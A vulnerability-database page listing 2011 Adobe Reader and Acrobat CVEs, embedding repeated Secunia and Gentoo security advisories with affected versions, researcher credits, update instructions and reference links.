VARIoT IoT vulnerabilities database
| VAR-201102-0032 | CVE-2011-0586 | Adobe Reader and Acrobat Vulnerable to arbitrary code execution |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X do not properly validate unspecified input data, which allows attackers to execute arbitrary code via unknown vectors. Adobe Acrobat and Reader are prone to a remote code-execution vulnerability.
Attackers can exploit this issue to execute arbitrary code in the context of the user running the affected application.
Adobe Reader and Acrobat versions prior to 9.4.2 and 10.0.1 are affected.
For more information:
SA43207
SOLUTION:
Updated packages are available via Red Hat Network. ----------------------------------------------------------------------
Get a tax break on purchases of Secunia Solutions!
If you are a U.S. company, you may be qualified for a tax break for your software purchases. Learn more at:
http://secunia.com/products/corporate/vim/section_179/
----------------------------------------------------------------------
TITLE:
Adobe Reader / Acrobat Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA43207
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/43207/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=43207
RELEASE DATE:
2011-02-09
DISCUSS ADVISORY:
http://secunia.com/advisories/43207/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/43207/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=43207
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in Adobe Reader /
Acrobat, which can be exploited by malicious, local users to gain
escalated privileges and by malicious people to conduct cross-site
scripting attacks and compromise a user's system.
2) An unspecified error can be exploited to corrupt memory.
3) An unspecified error related to file permissions in Windows-based
versions can be exploited to gain escalated privileges.
4) An unspecified error may allow code execution.
5) An unspecified error when parsing images can be exploited to
corrupt memory.
6) An error in AcroRd32.dll when parsing certain images can be
exploited to corrupt memory.
7) An unspecified error in the Macintosh-based versions may allow
code execution.
9) An unspecified error may allow code execution.
10) A input validation error may allow code execution.
11) An input validation error can be exploited to conduct cross-site
scripting attacks.
13) An unspecified error can be exploited to corrupt memory.
14) A boundary error when decoding U3D image data in an IFF file can
be exploited to cause a buffer overflow.
15) A boundary error when decoding U3D image data in a RGBA file can
be exploited to cause a buffer overflow.
16) A boundary error when decoding U3D image data in a BMP file can
be exploited to cause a buffer overflow.
17) A boundary error when decoding U3D image data in a PSD file can
be exploited to cause a buffer overflow.
18) An input validation error when parsing fonts may allow code
execution.
19) A boundary error when decoding U3D image data in a FLI file can
be exploited to cause a buffer overflow.
20) An error in 2d.dll when parsing height and width values of RLE_8
compressed BMP files can be exploited to cause a heap-based buffer
overflow.
21) An integer overflow in ACE.dll when parsing certain ICC data can
be exploited to cause a buffer overflow.
22) A boundary error in rt3d.dll when parsing bits per pixel and
number of colors if 4/8-bit RLE compressed BMP files can be exploited
to cause a heap-based buffer overflow.
23) An error in the U3D implementation when handling the Parent Node
count can be exploited to cause a buffer overflow.
24) A boundary error when processing JPEG files embedded in a PDF
file can be exploited to corrupt heap memory.
25) An unspecified error when parsing images may allow code
execution.
26) An input validation error can be exploited to conduct cross-site
scripting attacks.
27) An unspecified error in the Macintosh-based versions may allow
code execution.
28) A boundary error in rt3d.dll when parsing certain files can be
exploited to cause a stack-based buffer overflow.
29) An integer overflow in the U3D implementation when parsing a ILBM
texture file can be exploited to cause a buffer overflow.
30) Some vulnerabilities are caused due to vulnerabilities in the
bundled version of Adobe Flash Player.
For more information:
SA43267
The vulnerabilities are reported in versions 8.2.5 and prior, 9.4.1
and prior, and 10.0 and prior.
SOLUTION:
Update to version 8.2.6, 9.4.2, or 10.0.1.
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
PROVIDED AND/OR DISCOVERED BY:
2) Bing Liu, Fortinet's FortiGuard Labs.
6) Abdullah Ada via ZDI.
8) Haifei Li, Fortinet's FortiGuard Labs.
14 - 17, 19, 20, 22, 29) Peter Vreugdenhil via ZDI.
21) Sebastian Apelt via ZDI.
23) el via ZDI.
14) Sean Larsson, iDefense Labs.
28) An anonymous person via ZDI.
The vendor also credits:
1) Mitja Kolsek, ACROS Security.
3) Matthew Pun.
4, 5, 18) Tavis Ormandy, Google Security Team.
7) James Quirk.
9) Brett Gervasoni, Sense of Security.
10) Joe Schatz.
11, 26) Billy Rios, Google Security Team.
12) Greg MacManus, iSIGHT Partners Labs and Parvez Anwar.
13) CESG.
25) Will Dormann, CERT.
27) Marc Schoenefeld, Red Hat Security Response Team.
ORIGINAL ADVISORY:
Adobe (APSB11-03)
http://www.adobe.com/support/security/bulletins/apsb11-03.html
http://www.adobe.com/support/security/bulletins/apsb11-02.html
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-11-065/
http://www.zerodayinitiative.com/advisories/ZDI-11-066/
http://www.zerodayinitiative.com/advisories/ZDI-11-067/
http://www.zerodayinitiative.com/advisories/ZDI-11-068/
http://www.zerodayinitiative.com/advisories/ZDI-11-069/
http://www.zerodayinitiative.com/advisories/ZDI-11-070/
http://www.zerodayinitiative.com/advisories/ZDI-11-071/
http://www.zerodayinitiative.com/advisories/ZDI-11-072/
http://www.zerodayinitiative.com/advisories/ZDI-11-073/
http://www.zerodayinitiative.com/advisories/ZDI-11-074/
http://www.zerodayinitiative.com/advisories/ZDI-11-075/
http://www.zerodayinitiative.com/advisories/ZDI-11-077/
FortiGuard Labs:
http://www.fortiguard.com/advisory/FGA-2011-06.html
iDefense:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=891
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201201-19
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: Adobe Reader: Multiple vulnerabilities
Date: January 30, 2012
Bugs: #354211, #382969, #393481
ID: 201201-19
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities in Adobe Reader might allow remote attackers
to execute arbitrary code or conduct various other attacks.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 app-text/acroread < 9.4.7 >= 9.4.7=20
Description
===========
Multiple vulnerabilities have been discovered in Adobe Reader. Please
review the CVE identifiers referenced below for details.
Impact
======
A remote attacker could entice a user to open a specially crafted PDF
file using Adobe Reader, possibly resulting in the remote execution of
arbitrary code, a Denial of Service, or other impact.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Adobe Reader users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=app-text/acroread-9.4.7"
References
==========
[ 1 ] CVE-2010-4091
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4091
[ 2 ] CVE-2011-0562
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0562
[ 3 ] CVE-2011-0563
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0563
[ 4 ] CVE-2011-0565
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0565
[ 5 ] CVE-2011-0566
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0566
[ 6 ] CVE-2011-0567
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0567
[ 7 ] CVE-2011-0570
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0570
[ 8 ] CVE-2011-0585
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0585
[ 9 ] CVE-2011-0586
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0586
[ 10 ] CVE-2011-0587
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0587
[ 11 ] CVE-2011-0588
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0588
[ 12 ] CVE-2011-0589
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0589
[ 13 ] CVE-2011-0590
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0590
[ 14 ] CVE-2011-0591
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0591
[ 15 ] CVE-2011-0592
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0592
[ 16 ] CVE-2011-0593
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0593
[ 17 ] CVE-2011-0594
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0594
[ 18 ] CVE-2011-0595
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0595
[ 19 ] CVE-2011-0596
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0596
[ 20 ] CVE-2011-0598
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0598
[ 21 ] CVE-2011-0599
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0599
[ 22 ] CVE-2011-0600
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0600
[ 23 ] CVE-2011-0602
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0602
[ 24 ] CVE-2011-0603
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0603
[ 25 ] CVE-2011-0604
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0604
[ 26 ] CVE-2011-0605
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0605
[ 27 ] CVE-2011-0606
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0606
[ 28 ] CVE-2011-2130
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2130
[ 29 ] CVE-2011-2134
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2134
[ 30 ] CVE-2011-2135
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2135
[ 31 ] CVE-2011-2136
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2136
[ 32 ] CVE-2011-2137
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2137
[ 33 ] CVE-2011-2138
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2138
[ 34 ] CVE-2011-2139
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2139
[ 35 ] CVE-2011-2140
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2140
[ 36 ] CVE-2011-2414
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2414
[ 37 ] CVE-2011-2415
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2415
[ 38 ] CVE-2011-2416
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2416
[ 39 ] CVE-2011-2417
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2417
[ 40 ] CVE-2011-2424
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2424
[ 41 ] CVE-2011-2425
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2425
[ 42 ] CVE-2011-2431
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2431
[ 43 ] CVE-2011-2432
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2432
[ 44 ] CVE-2011-2433
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2433
[ 45 ] CVE-2011-2434
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2434
[ 46 ] CVE-2011-2435
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2435
[ 47 ] CVE-2011-2436
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2436
[ 48 ] CVE-2011-2437
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2437
[ 49 ] CVE-2011-2438
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2438
[ 50 ] CVE-2011-2439
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2439
[ 51 ] CVE-2011-2440
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2440
[ 52 ] CVE-2011-2441
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2441
[ 53 ] CVE-2011-2442
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2442
[ 54 ] CVE-2011-2462
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2462
[ 55 ] CVE-2011-4369
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4369
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201201-19.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2012 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
| VAR-201102-0033 | CVE-2011-0587 | Adobe Reader and Acrobat Vulnerable to cross-site scripting |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2011-0604. Adobe Reader and Acrobat A cross-site scripting vulnerability exists. This vulnerability CVE-2011-0604 Is a different vulnerability.By any third party Web Script or HTML May be inserted.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Remote attackers can inject arbitrary web scripts or HTML with unknown vectors.
For more information:
SA43207
SOLUTION:
Updated packages are available via Red Hat Network. ----------------------------------------------------------------------
Get a tax break on purchases of Secunia Solutions!
If you are a U.S. company, you may be qualified for a tax break for your software purchases. Learn more at:
http://secunia.com/products/corporate/vim/section_179/
----------------------------------------------------------------------
TITLE:
Adobe Reader / Acrobat Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA43207
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/43207/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=43207
RELEASE DATE:
2011-02-09
DISCUSS ADVISORY:
http://secunia.com/advisories/43207/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/43207/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=43207
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in Adobe Reader /
Acrobat, which can be exploited by malicious, local users to gain
escalated privileges and by malicious people to conduct cross-site
scripting attacks and compromise a user's system.
1) An unspecified error related to library loading can be exploited
to execute arbitrary code.
2) An unspecified error can be exploited to corrupt memory.
3) An unspecified error related to file permissions in Windows-based
versions can be exploited to gain escalated privileges.
4) An unspecified error may allow code execution.
5) An unspecified error when parsing images can be exploited to
corrupt memory.
6) An error in AcroRd32.dll when parsing certain images can be
exploited to corrupt memory.
7) An unspecified error in the Macintosh-based versions may allow
code execution.
8) An unspecified error related to library loading can be exploited
to execute arbitrary code.
9) An unspecified error may allow code execution.
10) A input validation error may allow code execution.
11) An input validation error can be exploited to conduct cross-site
scripting attacks.
12) An unspecified error related to library loading can be exploited
to execute arbitrary code.
13) An unspecified error can be exploited to corrupt memory.
14) A boundary error when decoding U3D image data in an IFF file can
be exploited to cause a buffer overflow.
15) A boundary error when decoding U3D image data in a RGBA file can
be exploited to cause a buffer overflow.
16) A boundary error when decoding U3D image data in a BMP file can
be exploited to cause a buffer overflow.
17) A boundary error when decoding U3D image data in a PSD file can
be exploited to cause a buffer overflow.
18) An input validation error when parsing fonts may allow code
execution.
19) A boundary error when decoding U3D image data in a FLI file can
be exploited to cause a buffer overflow.
20) An error in 2d.dll when parsing height and width values of RLE_8
compressed BMP files can be exploited to cause a heap-based buffer
overflow.
21) An integer overflow in ACE.dll when parsing certain ICC data can
be exploited to cause a buffer overflow.
22) A boundary error in rt3d.dll when parsing bits per pixel and
number of colors if 4/8-bit RLE compressed BMP files can be exploited
to cause a heap-based buffer overflow.
23) An error in the U3D implementation when handling the Parent Node
count can be exploited to cause a buffer overflow.
24) A boundary error when processing JPEG files embedded in a PDF
file can be exploited to corrupt heap memory.
25) An unspecified error when parsing images may allow code
execution.
26) An input validation error can be exploited to conduct cross-site
scripting attacks.
27) An unspecified error in the Macintosh-based versions may allow
code execution.
28) A boundary error in rt3d.dll when parsing certain files can be
exploited to cause a stack-based buffer overflow.
29) An integer overflow in the U3D implementation when parsing a ILBM
texture file can be exploited to cause a buffer overflow.
30) Some vulnerabilities are caused due to vulnerabilities in the
bundled version of Adobe Flash Player.
For more information:
SA43267
The vulnerabilities are reported in versions 8.2.5 and prior, 9.4.1
and prior, and 10.0 and prior.
SOLUTION:
Update to version 8.2.6, 9.4.2, or 10.0.1.
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
PROVIDED AND/OR DISCOVERED BY:
2) Bing Liu, Fortinet's FortiGuard Labs.
6) Abdullah Ada via ZDI.
8) Haifei Li, Fortinet's FortiGuard Labs.
14 - 17, 19, 20, 22, 29) Peter Vreugdenhil via ZDI.
21) Sebastian Apelt via ZDI.
23) el via ZDI.
14) Sean Larsson, iDefense Labs.
28) An anonymous person via ZDI.
The vendor also credits:
1) Mitja Kolsek, ACROS Security.
3) Matthew Pun.
4, 5, 18) Tavis Ormandy, Google Security Team.
7) James Quirk.
9) Brett Gervasoni, Sense of Security.
10) Joe Schatz.
11, 26) Billy Rios, Google Security Team.
12) Greg MacManus, iSIGHT Partners Labs and Parvez Anwar.
13) CESG.
25) Will Dormann, CERT.
27) Marc Schoenefeld, Red Hat Security Response Team.
ORIGINAL ADVISORY:
Adobe (APSB11-03)
http://www.adobe.com/support/security/bulletins/apsb11-03.html
http://www.adobe.com/support/security/bulletins/apsb11-02.html
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-11-065/
http://www.zerodayinitiative.com/advisories/ZDI-11-066/
http://www.zerodayinitiative.com/advisories/ZDI-11-067/
http://www.zerodayinitiative.com/advisories/ZDI-11-068/
http://www.zerodayinitiative.com/advisories/ZDI-11-069/
http://www.zerodayinitiative.com/advisories/ZDI-11-070/
http://www.zerodayinitiative.com/advisories/ZDI-11-071/
http://www.zerodayinitiative.com/advisories/ZDI-11-072/
http://www.zerodayinitiative.com/advisories/ZDI-11-073/
http://www.zerodayinitiative.com/advisories/ZDI-11-074/
http://www.zerodayinitiative.com/advisories/ZDI-11-075/
http://www.zerodayinitiative.com/advisories/ZDI-11-077/
FortiGuard Labs:
http://www.fortiguard.com/advisory/FGA-2011-06.html
iDefense:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=891
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201201-19
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: Adobe Reader: Multiple vulnerabilities
Date: January 30, 2012
Bugs: #354211, #382969, #393481
ID: 201201-19
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities in Adobe Reader might allow remote attackers
to execute arbitrary code or conduct various other attacks.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 app-text/acroread < 9.4.7 >= 9.4.7=20
Description
===========
Multiple vulnerabilities have been discovered in Adobe Reader. Please
review the CVE identifiers referenced below for details.
Impact
======
A remote attacker could entice a user to open a specially crafted PDF
file using Adobe Reader, possibly resulting in the remote execution of
arbitrary code, a Denial of Service, or other impact.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Adobe Reader users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=app-text/acroread-9.4.7"
References
==========
[ 1 ] CVE-2010-4091
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4091
[ 2 ] CVE-2011-0562
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0562
[ 3 ] CVE-2011-0563
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0563
[ 4 ] CVE-2011-0565
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0565
[ 5 ] CVE-2011-0566
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0566
[ 6 ] CVE-2011-0567
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0567
[ 7 ] CVE-2011-0570
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0570
[ 8 ] CVE-2011-0585
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0585
[ 9 ] CVE-2011-0586
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0586
[ 10 ] CVE-2011-0587
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0587
[ 11 ] CVE-2011-0588
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0588
[ 12 ] CVE-2011-0589
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0589
[ 13 ] CVE-2011-0590
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0590
[ 14 ] CVE-2011-0591
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0591
[ 15 ] CVE-2011-0592
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0592
[ 16 ] CVE-2011-0593
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0593
[ 17 ] CVE-2011-0594
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0594
[ 18 ] CVE-2011-0595
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0595
[ 19 ] CVE-2011-0596
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0596
[ 20 ] CVE-2011-0598
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0598
[ 21 ] CVE-2011-0599
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0599
[ 22 ] CVE-2011-0600
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0600
[ 23 ] CVE-2011-0602
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0602
[ 24 ] CVE-2011-0603
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0603
[ 25 ] CVE-2011-0604
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0604
[ 26 ] CVE-2011-0605
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0605
[ 27 ] CVE-2011-0606
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0606
[ 28 ] CVE-2011-2130
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2130
[ 29 ] CVE-2011-2134
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2134
[ 30 ] CVE-2011-2135
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2135
[ 31 ] CVE-2011-2136
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2136
[ 32 ] CVE-2011-2137
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2137
[ 33 ] CVE-2011-2138
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2138
[ 34 ] CVE-2011-2139
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2139
[ 35 ] CVE-2011-2140
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2140
[ 36 ] CVE-2011-2414
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2414
[ 37 ] CVE-2011-2415
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2415
[ 38 ] CVE-2011-2416
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2416
[ 39 ] CVE-2011-2417
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2417
[ 40 ] CVE-2011-2424
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2424
[ 41 ] CVE-2011-2425
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2425
[ 42 ] CVE-2011-2431
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2431
[ 43 ] CVE-2011-2432
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2432
[ 44 ] CVE-2011-2433
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2433
[ 45 ] CVE-2011-2434
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2434
[ 46 ] CVE-2011-2435
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2435
[ 47 ] CVE-2011-2436
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2436
[ 48 ] CVE-2011-2437
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2437
[ 49 ] CVE-2011-2438
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2438
[ 50 ] CVE-2011-2439
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2439
[ 51 ] CVE-2011-2440
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2440
[ 52 ] CVE-2011-2441
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2441
[ 53 ] CVE-2011-2442
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2442
[ 54 ] CVE-2011-2462
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2462
[ 55 ] CVE-2011-4369
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4369
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201201-19.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2012 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
| VAR-201102-0031 | CVE-2011-0585 | Adobe Reader and Acrobat Vulnerable to arbitrary code execution |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Unspecified vulnerability in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allows attackers to cause a denial of service or possibly execute arbitrary code via unknown vectors, a different vulnerability than CVE-2011-0565. This vulnerability CVE-2011-0565 Is a different vulnerability.Denial of service by attacker (DoS) Could be put into a state or execute arbitrary code. Adobe Acrobat and Reader are prone to a remote denial-of-service vulnerability.
Attackers can exploit this issue to cause the affected application to crash. Arbitrary code execution may be possible; this has not been confirmed.
